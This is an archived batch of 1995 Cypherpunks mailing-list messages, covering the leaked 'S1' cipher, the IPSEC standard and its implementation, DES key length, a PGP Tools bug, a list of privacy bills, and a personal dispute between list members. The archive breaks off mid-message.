mhobbs@rad.rpslmc.edu

p.s.
As to the cpremailer page that I posted here last week;
-I have removed the hardwired remailer and now allow
simple of choosing of remailers.  I also think I have the
news instructions up to date.
http://miso.wwa.com/~dochobbs/cpremailer.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 10 Aug 95 11:58:55 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <9508101902.AA15691@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>Jon writes:
>> Two other possibilities: (1) It's merely an independently produced 
>> cryptosystem disguised as a "leak" to save its creator the trouble of 
>> asking experts to analyze it for him/her.  

>It strikes me as rather foolish to mail off anonymous copies to several
>individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
>S1 is a real leak. Why aid the traffic analysts by firing off multiple
>messages through the remailers ?

A third possibility comes to mind, that person or persons associated with
the list are using the post to focus on cryptographic efforts in lieu of
political or apocalyptic diatribes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Thu, 10 Aug 95 09:10:56 PDT
To: cypherpunks@toad.com
Subject: Re: Why DES in IPSEC ESP?
Message-ID: <199508101611.MAA03223@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> | Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 

Because people were going completely nuts about mandating something
not easily specifiable at all.  DES was an easier case to make than
3DES.

>> 	So, in order to ship sooner rather than later, DES was chosen.
>> 3DES will probably be available soon afterwards.

Shipping is irrelevant.  Perry is busily coding 3DES support into
NetBSD.  Once it's in the bsd network stack, it will spread
everywhere.  Presumably, someone will implement it outside the US as
well.

As Perry put it succinctly at a recent IETF meeting, people will not
necessarily use what is mandated.  They will use what is available.
If 3DES is in the freely available reference implementation (which it
will be), and it performs adequately, that is what will get used.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 09:16:55 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgafh-0009yuC@sdwsys>
Message-ID: <199508101615.MAA11483@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams writes:
> Could we please share snapshots of any code that exists?  Even if it's
> for a totally different OS, it's still extremely helpful if we're short
> on time.

Thats certainly something people expect to do -- I'll begin letting
people at my code in a couple of weeks.

There is a mailing list for IPSEC developers right now -- people who
have read the RFCs and decide to get serious might want to subscribe.

> I'm interested in doing/helping with Linux.  I also have access to
> an SGI Indy (less well ready to develop though) and HPUX.

Kernel sources are important here -- if you don't have kernel sources
IPSEC may be a challenge to put into a kernel...

> Does it make any sense to talk about loopback interface style wedges to
> convert OS native IP to IPSEC?  What about a version of inetd that
> wraps apps?

Steve Bellovin has a summer student who did an interesting wedge on
PCs running packet driver interfaces in which he interposed his stuff
between the stack and the real packet driver. However, this can only
be of use for host-host keying and not user-user which is the real goal.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 10 Aug 95 12:10:02 PDT
To: John Young <cypherpunks@toad.com
Subject: Conspiracies and "Ciphergroupies"
Message-ID: <ac4f9f9703021004675d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:57 PM 8/10/95, John Young wrote:
>   I respect the view that sound crypto requires skeptical
>   review and testing outside closed rooms. Conspiracies live
>   or die by the same process. Crypto would die if there was
>   no belief in conspiracies.
>
>   Conspiracy theory drives the cypherpunk agenda, I surmised
>   from the welcoming statement. Note the caution about "S1,"
>   and any other crypto offering.

I think a better, and less loaded, tern than "conspiracies" is "threat models."

It has always been important to many of us that the policies and plans of
potential threats be discussed, analyzed, etc. Thus, our recurring focus on
the activities of the NSA, GCHQ, FinCEN, and so on. For example, all folks
on this list should almost certainly read "The Puzzle Palace," even though
it does not _directly_ help with the latest project in writing code.

And like Orlin Grabbe, whose "End of Money" article I posted a pointer to
last winter, I closely follow the recent developments involving the
intelligence agencies, the plans to  limit crypto, etc.

(By the way, it was my close following of the NSA and related
organizations, and my monitoring of what Dorothy Denning was saying, that
led to my "A Trial Balloon to Ban Crypto?" article in this group and in
sci.crypt three years ago. This warning, which generated much discussion on
sci.crypt and here, prepared us for the Clipper announcement six months
later.)

Is this wasted time? Shouldn't I be using my time to write Trumpet
Winsocks--whatever they are!--for WinCypherHyperPhone?

Well, we all decide what our interests are, and exhortations by others that
we are not working on what is "really" important are not very useful. There
are probably a dozen different sorts of interests here, ranging from a
bunch of folks interested in popularizing crypto to several law professors
and lawyers interested in legal aspects to Internet programming experts.
Even some pure mathematicians. Even some novices.


>   Perry's sharp statements on the urgent need for crypto
>   deployment are motivated, it seems to me, by a view of a
>   believable, if not wholly proveable, threat that crypto is
>   believed to counter. I choose to believe him; Orlin's got my
>   skeptical interest -- put up or shut up -- and he's not out
>   of line.

Perry is Perry. He has certainly written his share of rants and "off-topic"
posts, as have we all. Literally thousands of his posts over the past 3
years reside on my disk drives, and certainly until recently most of them
were not about writing code.

Ironically, just a few weeks ago, Perry was sharply criticizing me for my
"Crisis Overload" post and was urging me to join him in a serious lobbying
effort to undermine the Grassley bill. I declined, thinking it unlikely to
succeed and preferring to concentrate on my other project (including a new
release of SmalltalkAgents, just arrived). When I preferred to work on more
technical things than launching a grassroots political campaign, he got
abusive and insulting in e-mail and I told him I would no longer accept
this sort of abuse. You may recall he chose to post this private message
here in public, without of course the messages that preceeded this (and
without my permission, needless to say).

Again, Perry is Perry.

People work on what interests them. It is nice for Perry, and maybe for all
of us if his efforts work out, that he has thrown himself into this new
programming project, but it is wrong for him to automatically dismiss the
interests and efforts of others.

There's also a certain "control freak" attitude that creeps into this list
(and other lists, of course) at times, wherein people say that their
current interest is vastly more important than anything else and that
anyone who does not drop their frivolous other interests and begin work
immediately on the One True Project are fools and knaves, and are probably
secretly working for the NSA! (:-}).

People should write about what interests them. Those who wish to program,
should program. Those who wish to explore number theory, should explore
number theory. And so on.

Attempting to control what gets posted on this list is pointless. If you
don't like a particular topic, or an author, use filters and kill files.
This can be done in many ways, including mail programs, procmail, and even
the "MailWeir" service that Harry Hawk offers. And many people dump the
list traffic into local newsgroups, allowing threadified reading. Also,
various digestified versions of the list exist--Eric Blossom has one.

Insulting people as "ciphergroupies" because they are not working on one's
current interest seems needlessly counterproductive.

Just my views. If you don't like 'em, ignore them or filter them. That's
the Cypherpunk way of doing things.

--Tim May


Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 09:19:10 PDT
To: cypherpunks@toad.com
Subject: where to get RFCs and internet drafts
Message-ID: <199508101619.MAA27815@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



A couple of people have asked, so I'm posting...

RFCs and internet drafts are both available for anonymous FTP from
ds.internic.net.

Phil Karn's photuris stuff is still in the early draft phase. Help
speed up development by playing with it!

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 10 Aug 95 09:06:32 PDT
To: perry@piermont.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508101452.KAA24637@panix4.panix.com>
Message-ID: <m0sgafh-0009yuC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain



> Adam Shostack writes:
> > | IPSEC is now a Proposed Standard.
> > 
> > | Again, *we need your help*. Cypherpunks write code. Help us make the
> > | internet safe for personal privacy by contributing to this effort.
> > 
> > 	How about posting a list of 'things that need doing?'  I
> > assume one is floating around, possibly even with time estimates?
> 
> The IETF was challenged by Steve Crocker to be ready for use of IPSEC
> for the Dallas meeting in December so that no IETFer who wanted to
> communicate securely with his home site need be insecure.
> 
> To accomplish that, we need to produce versions of the security stack
> for many architectures. Right now, we have AIX and 4.4BSD fairly
> solidly covered. Less well covered is HPUX. People familiar with code

Could we please share snapshots of any code that exists?  Even if it's
for a totally different OS, it's still extremely helpful if we're short
on time.

> like the Trumpet Winsock stack, Linux, or who have access to the

I'm interested in doing/helping with Linux.  I also have access to
an SGI Indy (less well ready to develop though) and HPUX.

> innards of SunOS, Solaris, Windows 95, Mac stacks, and others, and can
> legitimately release implementations for those platforms, are probably
> needed. We need serious commitments from people but of course everyone
> is trying to help everyone else along.
> 
> Basically, if you know how to hack kernels and networking code and you
> have a platform you can work on, we need you.
> 
> We also lack work on the key management end of things -- people who
> can start playing around with implementing Photuris, even on a "toy"
> basis, would probably be of help.
> 
> Perry

Does it make any sense to talk about loopback interface style wedges to
convert OS native IP to IPSEC?  What about a version of inetd that
wraps apps?

(I'm about to read the RFC's, so not sure if those suggestions make sense
yet.)

I really like the idea of using DNS for (public I assume) keys...

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 10 Aug 95 04:40:26 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be         interesting)
Message-ID: <9508101139.AA27386@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> BTW, the code has been posted to Usenet by a Frank Falstaff -- look for
> message ID <40b8tk$cj4@news.xs4all.nl> in sci.crypt (Wed, Aug. 9, 1995).
> His article refers to a message ID (namely <40b50l$oa8@utopia.hacktic.nl>)
> that differs from the message ID of the copy sent to c'punks. So it looks
> like there was at least one additional recipient. That's a minimum of 5
> originals so far....

It has been posted twice to sci.crypt, once from "Frank Falstaff", and
once through the remailer@utopia.hacktic.nl.  sci.crypt seems to have been
one of the recipients...


Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 10 Aug 95 05:48:09 PDT
To: cypherpunks@toad.com
Subject: Why DES in IPSEC ESP?
Message-ID: <Pine.SOL.3.91.950810133448.4480H-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I suppose this is really addressed at Perry:

Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 
If someone's IP traffic is being monitored and collected offline by some
agency then they're going to get about a couple of hours of security while
the special purpose key search hardware kicks into action.  I know other
algorithms can optionally be used, but surely it would have been better to
have a second, stronger algorithm specified mandatory as well. 


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Thu, 10 Aug 95 11:53:21 PDT
To: "Stephen D. Williams" <sdw@lig.net>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgafh-0009yuC@sdwsys>
Message-ID: <Pine.BSI.3.91.950810134314.7478B-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Stephen D. Williams wrote:

> 
> > Adam Shostack writes:
> > > | IPSEC is now a Proposed Standard.
> > > 
> > > | Again, *we need your help*. Cypherpunks write code. Help us make the
> > > | internet safe for personal privacy by contributing to this effort.
> > > 
> > > 	How about posting a list of 'things that need doing?'  I
> > > assume one is floating around, possibly even with time estimates?
> > 
> 
> Could we please share snapshots of any code that exists?  Even if it's
> for a totally different OS, it's still extremely helpful if we're short
> on time.
> 
> > like the Trumpet Winsock stack, Linux, or who have access to the
> 
> I'm interested in doing/helping with Linux.  I also have access to
> an SGI Indy (less well ready to develop though) and HPUX.


I'd like to also volunteer to do the linux port, whether it be
coordination patches, hacking code, finding people, whatever.


Also, if other cypherpunk subscribers feel that this topic
is inappropriate for the list (not likely) or that it would
generate too much traffic for the list (?) I can create a new
majordomo list dedicated to the effort in 10 minutes.

The aforementioned 'To Do List' could be the signup message
you get when joining the list.

Just a suggestion,
David.


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Aug 95 10:58:08 PDT
To: cypherpunks@toad.com
Subject: Conspiracies
Message-ID: <199508101757.NAA25579@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   I respect the view that sound crypto requires skeptical
   review and testing outside closed rooms. Conspiracies live
   or die by the same process. Crypto would die if there was
   no belief in conspiracies.

   Conspiracy theory drives the cypherpunk agenda, I surmised
   from the welcoming statement. Note the caution about "S1,"
   and any other crypto offering.

   Perry's sharp statements on the urgent need for crypto
   deployment are motivated, it seems to me, by a view of a
   believable, if not wholly proveable, threat that crypto is
   believed to counter. I choose to believe him; Orlin's got my
   skeptical interest -- put up or shut up -- and he's not out 
of line.

   But who knows more than what we read in the conspiracy-
   driven media and hear from our respected leaders?

   Take your pick of them, or believe your own home-grown,
   they're unavoidable, on cypherpunks or elsewhere -- they're
   the crippling religion of the ages.

   My mouth waters to hear the latest conspiracies about
   cypherpunks' evil spread of demon crypto.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 10 Aug 95 06:15:34 PDT
To: cypherpunks@toad.com
Subject: PGP Tools on Linux
Message-ID: <Pine.3.89.9508101424.A20107-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Did anyone ever get PGP Tools working on Linux ? I can compile it, but it 
has a marked tendency to get SEGVs when destroying fifos...

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Thu, 10 Aug 95 11:45:51 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: PGP Tools on Linux
In-Reply-To: <Pine.3.89.9508101424.A20107-0100000@unicorn.com>
Message-ID: <199508101842.OAA22544@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Did anyone ever get PGP Tools working on Linux ? I can compile it, but it 
> has a marked tendency to get SEGVs when destroying fifos...

Yea, I did a long time ago.  There was a bug in the code that caused
destroying fifos to do this -- it would free the fifo and then try to
set it, or something like that.  You have to reorder a few commands to
fix the problem.

I've not looked at PGPTools in a long time, so I can't give you any
more detailed information.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Thu, 10 Aug 95 15:12:26 PDT
To: "cypherpunks@toad.com>
Subject: Legislative One-Liners
Message-ID: <199508102212.PAA01472@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

DANGER: Legislature In Session! 

"One-Liners" List of 104th Congress privacy legislation. 
Latest update: 8/1/95.

The overview compiled by the Electronic Privacy Information Center 
(EPIC), info@epic.org, http://www.epic.org is edited here into single 
line entries by J. Kent Hastings, zeus@pinsight.com, Assistant Director 
of the Agorist Institute, http://www.pinsight.com/~zeus/agorist/

The full text of pending bills, and other legislative materials is 
available from cpsr.org /cpsr/privacy/epic/104th_congress_bills/

- -- House Bills -- 

Taking Back Our Streets (HR 3). Limits sanctions for illegal searches. 
Personal Responsibility (HR 4). Databases of new hires and child support. 
Risk Assessment (HR 9). Government Information Locator Service (GILS).
FBI Counterintelligence (HR 68). Easier access to credit reports by FBI. 
Electronic Anti-Stalking (HR 112). Electronic harassing a federal crime. 
Obscenity and Computers (HR 121). Network obscenity 10-year fed penalty.
Quality Assurance in Drug Testing (HR 153). Requirements for drug testing.
Individual Privacy Protection (HR 184). New national privacy commission. 
Interstate Child Support (HR 195). New hires database, IRS collection.
Export Administration (HR 361). Studies software encryption overseas. 
Antitrust Reform (HR 411). Orders FCC privacy survey, limits CPNI.
Postal Privacy (HR 434). Prohibits P.O. selling info to direct marketers. 
Fair Health Information Practices (HR 435). Health care privacy bill.
Restricted Explosives Control (HR 488). Federal permits, even black powder.
Social Security Anti-Fraud (HR 502). Telephone verification of applicants.
Immigration Reform (HR 560). Tamperproof ID cards for immigrants.
Consumer Reporting Reform (HR 561). Limits cost and use of credit reports.
Enforce Employer Sanctions (HR 570). SS card w/fingerprint, barcode, photo. 
Exclusionary Rule Reform (HR 666). Violates 4th Amendment, except IRS/BATF. 
Criminal Alien Deportation (HR 668). Wiretaps OK for illegal immigration.  
Illegal Immigration Control (HR 756). Wiretaps, machine SSN I.D., databases.

Child Support Responsibility (HR 785). Parents SSN birth/marriage documents.
Paperwork Reduction (HR 830). Coordinates federal information policy.
Comprehensive Antiterrorism (HR 896). "Terrorist organization" fund raising.
Child Support Enforcement (HR 906). Allows access to all financial records. 
Communications Decency Act (HR 1004). Same as Exon bill in Senate (S 314).
Illegal Immigration Control (HR 1018). Tamper proof Social Security cards.
Welfare Transformation (HR 1157). Database of new employees, parent locator.
American Health Security (HR 1200). Health records database for research.
Food Stamp Simplification (HR 1214). Increases SSN use. Electronic benefits.
Basic Health Care (HR 1234). Weak limits on medical information access.
Sexual Crimes Against Children (HR 1240). New penalties, computer networks.
DNA Identification (HR 1241). Revises funding authorized for Violent Crime. 
Family Stability (HR 1250). Database of employees, parents, more SSN use. 
Family Privacy Protection (HR 1271). Prohibits questionnaires of minors.
Revise Aliens and Nationality laws (HR 1292). Employment verification card.
Children's Media Protection (HR 1390). "V-Chip" TV filtering, ratings.
Communications Act of 1995 (HR 1555). Privacy of customer info, except CDA.
Antiterrorism Amendments (HR 1635). Eases wiretaps, credit report evidence.
Quality Assurance in Drug Testing (HR 1706). Standards for drug testing.
Comprehensive Antiterrorism (HR 1710). Eases wiretaps, credit evidence.
Constitutional Rights Oversight (HR 1738). Creates inspector general review.
Prevent Fraud in Health Care (HR 1758). Sharing of medical information.
Health Information Modernization (HR 1766). Health Information Network.
Counterterrorism Research (HR 1847). New DOJ surveillance and tracking.
High Risk Drivers (HR 1866). SSN as common identifier for drivers liscenses.
Health Care and Paperwork Reduction (HR 1912). Magnetic ID, SSN/health plan.
Immigration in the National Interest (HR 1915). More wiretaps, bank records.
Internet Freedom and Family Empowerment (HR 1978). On-line srvc screening.
Parental Control Inappropriate Programming(-ed.) (HR 2030). Another V-Chip.

  --  Senate Bills -- 

Violent Crime Control (S 3). OK's illegal search, wiretaps by foreign govts.
Family Health Insurance Protection (S 7). Democratic health care bill.
Exclusionary Rule Limitation (S 54). OK's violations of 4th Amendment.
Paperwork Reduction Act (S 244). Government Information Locator Svc (GILS).
Immigrant Control (S 269). National registry for workplace verification.
Private Long-Term Care (S 294). Creates "health information network".
Communications Decency Act (S 314). Outlaws sexual and anonymous messages.
High-risk Drivers Act (S 387). National system of driving records, uses SSN.
Marking of Plastic Explosives (S 390). Wiretaps terror "material support."
Interstate Child Support (S 456). Databank of new hires, SSA link.
Illegal Immigration Control (S 580). Wiretaps immigration and smuggling.
Child Custody Reform (S 632). Database of all child custody cases.
Telecommunications Competition (S 652). Restricts indecent Internet speech.
Taxpayer Browsing Protection (S 670). Stops unauthorized tax data viewing.
Child Support (S 687). Support obligation database. SSNs related documents.
Amend Fair Credit Reporting (S 709). Limits employment credit reports.
Study of Internet Pornography (S 714). Replacement for Comm Decency (S.314).
Comprehensive Terrorism (S 735). "Roving" wiretaps, Internet bomb info.
Economic Opportunity (S 746). Expands National Parent Locator Service.
Immigration Enforcement (S 754). Telephone verification for applicant SSNs.
Illegal Immigration (S 759). Database non-immigrants' entrance/exit dates.
Omnibus Counterterrorism (S 761). Pays for Digital Telephony and wiretaps.
Interstate Child Support (S 828). Both parents' SSNs birth/marriage/driver.
Real Welfare Reform (S 834). "Designated industries" support obligations.
Work and Gainful Employment (S 840). Child support, new hire, SSN documents.
Health Information Modernization (S 872). National health info network.
Protection of Children (S 892). Criminalizes indecent computer data.
Intelligence Authorization (S 922). Credit info, FBI "counterintelligence."
Interstate Child Support (S 926). Database of W-4 forms and child support.
Healthy Mothers, Healthy Children (S 933). Children's immunization database.
Information Technology Management (S 946). Chief Information Officer of OMB.
Anti-Electronic Racketeering (S 974). Bans encryption software distribution.
National Information Infrastructure (S 982) Newly defined computer crimes.
Illegal Immigration Control (S 999). Internal passport for all citizens.

- --- End of Listing ---

   ANNOUNCING: The "MIND YOUR 0WN BUSINESS" audiotext program. 
          1 - 9 0 0 - C A N - M Y 0 B  (1-900-226-6902)
            Notice the zero digit, not the letter "O."

       The Feds say you can't have privacy, but we say you 
                  CAN "Mind Your 0wn Business!" 

And now we have a 900 number to reveal new methods to defend your privacy 
from criminals and tyrants. Sponsored by The Agorist Institute.

The cost of each call is just 99 cents per minute, average cost $2.97, 
average length 3 minutes (August 1995 only. Future messages will be longer.)
You must be at least 18 to call or have parental permission. This is a much 
better deal than you'll get from most psychic or sex lines ;^)

The line will be updated by the 1st of each month. By September 1, 1995, 
our message will be recorded by a professional audio producer, but for now, 
you get to hear me read the first script. Don't be surprised if we update 
it during August.

	Kent

J. Kent Hastings, Assistant Director of The Agorist Institute 
zeus@pinsight.com -- http://www.pinsight.com/~zeus/agorist/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCqAeDTxxI221vktAQEaTAQAitl0r9d6nii64lfdIszWvnePURR0ti9h
JsL3pMk+CYwz3CweuVvCXXJKp3TX6P+hkL6kdjt2zJ6axQFAfRcLcl6BqpQcxI7p
MnHQbkLFQgI/4t9nM3RxieX5/a4idYtEAZuZh+y3ca160ftxCFLUaP6kordg/KI2
YgvAqrljkOA=
=SQWP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 10 Aug 95 06:41:16 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <199508101341.AA07297@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Futplex sez:

: BTW, the code has been posted to Usenet by a Frank Falstaff -- look for
: message ID <40b8tk$cj4@news.xs4all.nl> in sci.crypt (Wed, Aug. 9, 1995).
: His article refers to a message ID (namely <40b50l$oa8@utopia.hacktic.nl>)
: that differs from the message ID of the copy sent to c'punks. So it looks
: like there was at least one additional recipient. That's a minimum of 5
: originals so far....

The remailers at utopia.hacktic.nl use news.xs4all.nl as their 
newsserver, all messages get an "news.xs4all.nl-ID", all mail
ID's will have "utopia.hacktic.nl" in it.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 12:43:49 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <ac4f9f9703021004675d@[205.199.118.202]>
Message-ID: <199508101943.PAA27611@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



This is only of interest to a very limited number of people. Its
basically a flame about private matters. I discourage reading it.

Timothy C. May writes:
> Ironically, just a few weeks ago, Perry was sharply criticizing me for my
> "Crisis Overload" post and was urging me to join him in a serious lobbying
> effort to undermine the Grassley bill.

You are rewriting history. I just asked you if you thought that hiring
a Washington lobbying firm would be a good idea. I didn't urge you to
join anything. I had no intention of involving any of us personally
in any lobbying on the basis that professionals would do it better.

> I declined,

Actually, you were noncommittal.

> thinking it unlikely to succeed and preferring to concentrate on my
> other project (including a new release of SmalltalkAgents, just
> arrived). When I preferred to work on more technical things than
> launching a grassroots political campaign, he got abusive and
> insulting in e-mail and I told him I would no longer accept this
> sort of abuse.

Actually Tim, this is again a rewrite of history. I was having a
perfectly pleasant email conversation with you (the first in a while)
when your tax situation came up and I advised you that you ought to
get some professional tax people to look at your finances. I won't
mention what the situation was since that was private, but if you
insist I'll happily post our exchange. You claimed I was being
"abusive" and went off in a huff. I don't recall urging you to do
anything other than seeing a professional tax attorney.

I just checked my archive of our private mail exchange on the subject,
and it appears that my recollection is substantially accurate. As I
noted, if you insist, I'll happily post the private mail.

As for your activities: frankly, Tim, I haven't known you to do much
of anything over the years. This is, of course, your right. You've
earned your money and you now get to do whatever you like. Don't
claim, however, that I said or did things that I did not say or do.

> Insulting people as "ciphergroupies" because they are not working on one's
> current interest seems needlessly counterproductive.

If you'd read my messages, I listed a wide array of productive
activities. Merely because I feel that polluting the list with
messages about Vincent Foster's shoe size is a waste doesn't mean that
I think everyone has to be a clone. There are dozens of valuable
activities from lobbying to coding to spreading the word that people
can do. However, posting conspiracy theories isn't in the list.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 10 Aug 95 14:16:08 PDT
To: cypherpunks@toad.com
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <ac4f9f9703021004675d@[205.199.118.202]>
Message-ID: <Pine.BSI.3.91.950810155403.14661A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry works too hard sometimes.
Tim writes kewl articles.
Mr. Young keeps us up tp date on the Times.
Wei Dei has RSA on his case, in unwarranted fashion.
Alex gets it all across the water.
Brad is hung up on Vince Foster.
Lucky Green needs his antique tin.
Futplex has a cool name, and hot pointers.
Joel lives in his own 'Private Idaho'.
Robert now "Pinesigns" everything.

And today My web counter showed that over 1,000 folks had now used
my web page to get PGP. This includes over 300 shipped 'across the
dreaded water zones'. (sound of 1 hand clapping!)

I write code....html, that is......
I do attempt to use it judiciously.

censored.org censors no one. Just quietly enters
things to the unread mail stack (now 11.3 megs)
for a rainy day.

Have a fun summer...fall is coming soon, and light
a candle for Jerry Garica today.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 10 Aug 95 16:35:36 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <ac4e530c13021004688c@[205.199.118.202]>
Message-ID: <199508102330.QAA01345@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It seems that anything involving the Internet, the Web, and digital
> commerce is really, really hot.

	The fire that burns twice as hot burns half as long. It may be
a cliche but it is quite applicable here I think.

-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Aug 95 17:29:48 PDT
To: Anonymous <nowhere@bsu-cs.bsu.edu>
Subject: Re: your mail
In-Reply-To: <199508102329.SAA21100@bsu-cs.bsu.edu>
Message-ID: <Pine.SUN.3.91.950810163906.19605B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 10 Aug 1995, Anonymous wrote:

> will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
> I'm getting F---ING SICK AND TIRED of all the BULL**** [etc.]

> PARRY IS RIGHT. everyone else who disagrees can KISS MY ASS.

I, for one, am anxious to kiss Anonymous' ass.  Unfortunately,
he forgot to take credit for his clever bon mot, so I am unable
to comply.  What a pity.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 10 Aug 95 13:35:24 PDT
To: cypherpunks@toad.com
Subject: More "S-1" foolishness
Message-ID: <199508102043.QAA17280@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday I mentioned that I'd noticed that "S-1" has a non-uniform
distribution of F (Sbox?) outputs - some values appear far more often
